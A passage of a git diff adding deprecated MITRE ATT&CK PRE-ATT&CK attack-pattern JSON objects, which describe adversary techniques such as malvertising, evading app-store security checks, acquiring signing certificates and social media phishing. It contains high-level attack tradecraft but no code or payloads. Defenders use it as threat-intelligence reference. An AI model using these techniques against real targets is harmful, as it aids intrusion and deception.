NATIONAL INTELLIGENCE REQUIREMENTS FOR CHINA. Retrieved March 2, 2017." + }, + { + "source_name": "OrderOfBattle", + "description": "Wikipedia contributors. (2016, November 20). Order of battle. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1009", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8.json new file mode 100644 index 0000000000000000000000000000000000000000..fe3f332901d1e77441f01429dd7766e92aaada9d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--c27966d9-7c91-47ef-9a0a-4f503130242c", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--c9e85b80-39e8-42df-b275-86a2afcea9e8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Test ability to evade automated mobile application security analysis performed by app stores", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1393).\n\nMany mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1393", + "external_id": "T1393" + }, + { + "source_name": "Android Bouncer", + "description": "Jon Oberheide and Charlie Miller. (2012). DISSECTING THE ANDROID BOUNCER. Retrieved April 12, 2017." + }, + { + "source_name": "Adventures in BouncerLand", + "description": "Nicholas J. Percoco and Sean Schulte. (2012). Adventures in BouncerLand. Retrieved April 12, 2017." + }, + { + "source_name": "Jekyll on iOS", + "description": "Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013). Jekyll on iOS: When Benign Apps Become Evil. Retrieved April 12, 2017." + }, + { + "source_name": "Fruit vs Zombies", + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "The app store operators (e.g., Apple and Google) may detect the attempts, but it would not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can submit code remotely using throwaway accounts, although a registration fee may need to be paid for each new account (e.g., $99 for Apple and $25 for Google Play Store).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1170", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1.json new file mode 100644 index 0000000000000000000000000000000000000000..a714b70b9c608e3b81d48af290bae45b648508b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--a2cab606-26d4-4b8d-be50-1ce71350d7ec", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--d72c0bc0-3007-418c-842c-328027ebdbc1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deploy exploit using advertising", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nExploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1380", + "url": "https://attack.mitre.org/techniques/T1380" + }, + { + "description": "Michael Mimoso. (2015, March 30). AD NETWORKS RIPE FOR ABUSE VIA MALVERTISING. Retrieved March 9, 2017.", + "source_name": "TPMalvertising" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:18:44.045Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1157", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "An adversary can deploy exploits via malvertising using multiple mechanisms. Such mechanisms include an image ad that is infected, redirection, or using social engineering to get the end user to install the malicious software themselves.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Although some commercial technologies are being advertised which claim to detect malvertising, it largely spreads unknowingly because it doesn't always require an action by a user.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59.json new file mode 100644 index 0000000000000000000000000000000000000000..8df91365f8c1c947c38461f3d4c3643d0cc065da --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--1cb8d739-1c28-4a12-a60f-5ce6d0bec369", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire or compromise 3rd party signing certificates", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1310).\n\nCode signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1310", + "external_id": "T1310" + }, + { + "description": "Brad Arkin. (2012, September 27). Inappropriate Use of Adobe Code Signing Certificate. Retrieved March 28, 2017.", + "source_name": "Adobe Code Signing Cert" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1087", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6.json new file mode 100644 index 0000000000000000000000000000000000000000..748e490e92e180030cd578422beae38db13bf663 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--94eed214-90f9-47e7-91a7-774bcc06ce32", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--e6ca2820-a564-4b74-b42a-b6bdf052e5b6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obfuscate infrastructure", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1309).\n\nObfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1309", + "external_id": "T1309" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Difficult, but defender is well aware of technique and attempts to find discrepancies.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has a variety of solutions, ranging in difficulty, that can be employed (e.g., BGP hijacking, tunneling, reflection, multi-hop, etc.)\nAdversary can also use misattributable credentials to obtain servers, build environment, [https://aws.amazon.com Amazon Web Services] (AWS) accounts, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1086", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e754fa49-2db1-416b-92db-7f886decd099.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e754fa49-2db1-416b-92db-7f886decd099.json new file mode 100644 index 0000000000000000000000000000000000000000..cddb0de50f6607274f5b8daa096b1466f650d295 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e754fa49-2db1-416b-92db-7f886decd099.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--5021d1cb-9341-4660-bb9f-ec7caeb98cdb", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--e754fa49-2db1-416b-92db-7f886decd099", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Generate analyst intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1234).\n\nAnalysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1234", + "external_id": "T1234" + }, + { + "source_name": "Herring1999", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1011", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37.json new file mode 100644 index 0000000000000000000000000000000000000000..1f0a99582bd0a9d9b648ea90a42379aa6a4e9d20 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--debeaddf-809f-4c68-8946-83015fcfbe22", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--e8471f43-2742-4fd7-9af7-8ed1330ada37", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Upload, install, and configure software/tools", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1362).\n\nAn adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1362", + "external_id": "T1362" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + }, + { + "source_name": "RedOctober", + "description": "GReAT. (2013, January 17). \u201cRed October\u201d. Detailed Malware Description 4. Second Stage of Attack. Retrieved March 7, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS providers).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1139", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f.json new file mode 100644 index 0000000000000000000000000000000000000000..b51efcb29e8b4c042fb2f2e291db1f166911a1ee --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--23f6006b-7625-4529-ac3f-b75bdda6c3fd", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--eacadff4-164b-451c-bacc-7b29ebfd0c3f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create infected removable media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1355).\n\nUse of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1355", + "external_id": "T1355" + }, + { + "source_name": "BadUSB", + "description": "Security Research labs. (n.d.). BadUSB Exposure. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1132", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d.json new file mode 100644 index 0000000000000000000000000000000000000000..e73e2f230755afd733e4926c85d0bf17942f8c8e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--f3e76a5f-e74e-419a-bef0-8e0d0c7c2805", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Friend/Follow/Connect to targets of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1364).\n\nA form of social engineering designed build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1364", + "external_id": "T1364" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1141", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Connecting with \"friends\" is a fundamental requirement for social media - without it, social media is worthless. An adversary can easily create a profile and request targets to validate the requests.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Users have the ability to detect and report non-authenticated individuals requesting to follow, friend or connect to a target. However the rigidity in validating the users is not typically followed by standard users.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1.json new file mode 100644 index 0000000000000000000000000000000000000000..7ab8d09e710eb79bfadcde1646c82472dec50216 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--91ff5cae-f97e-44ab-9687-bbd901e2ecc4", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--eb517589-eefc-480e-b8e3-7a8b1066f6f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Targeted social media phishing", + "description": "**This technique has been deprecated. Please use [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003).**\n\nSending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1366", + "url": "https://attack.mitre.org/techniques/T1366" + }, + { + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017.", + "source_name": "APT1" + }, + { + "description": "Bart Blaze. (2016, November 20). Nemucod downloader spreading via Facebook. Retrieved March 28, 2017.", + "source_name": "Nemucod Facebook" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:27:43.972Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1143", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending messages to individuals identified as a target follows normal tradecraft for using social media.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Extremely hard to identify (in the launch phase) what message via social media is hostile versus what is not. Increased use of encrypted communications increases the difficulty average defender's have in detecting use of this technique.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0.json new file mode 100644 index 0000000000000000000000000000000000000000..a615d5c9dfd7a47b33c78b60ac15ff43d932516b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a2b22710-c05b-415c-ac2a-730ac462cc4b", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--ec739e26-d097-4804-b04a-54dd81ff11e0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Create strategic plan", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1231).\n\nStrategic plans outline the mission, vision, and goals for an adversary at a high level in relation to the key partners, topics, and functions the adversary carries out. (Citation: KPMGChina5Year) (Citation: China5YearPlans) (Citation: ChinaUN)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1231", + "external_id": "T1231" + }, + { + "source_name": "KPMGChina5Year", + "description": "KPMG. (2016, October 19). China\u2019s 13th Five-Year Plan signals a potential new era of Sino-foreign cooperation, finds KPMG report. Retrieved March 2, 2017." + }, + { + "source_name": "China5YearPlans", + "description": "Wikipedia contributors. (2017, February 8). Five-year plans of China. Retrieved March 2, 2017." + }, + { + "source_name": "ChinaUN", + "description": "People's Republic of China. (2015, November). China's 13th Five-Year Plan. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1008", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d.json new file mode 100644 index 0000000000000000000000000000000000000000..82ad68f7f7b5a7e9f086ee438835a829e214af62 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--11c80d4b-7870-46d3-a164-93cc70d754c9", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze social and business relationships, interests, and affiliations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1295).\n\nSocial media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1295", + "external_id": "T1295" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public sources are external to the defender's organization. Some social media sites have an option to show you when users are looking at your profile, but an adversary can evade this tracking depending on how they conduct the searches.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Social and business relationship information for an individual can be found by examining their social media contacts (e.g., [https://www.facebook.com Facebook] and [https://www.linkedin.com LinkedIn]). Social media also provides insight into the target's affiliations with groups and organizations. Finally, certification information can explain their technical associations and professional associations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1072", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957.json new file mode 100644 index 0000000000000000000000000000000000000000..1a5fc02d13533cfe6a7837351b6fb5bf9e5c40f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--3c6ed201-43d8-4815-a503-b92f85ce1102", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--ef0f816a-d561-4953-84c6-2a2936c96957", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Discover 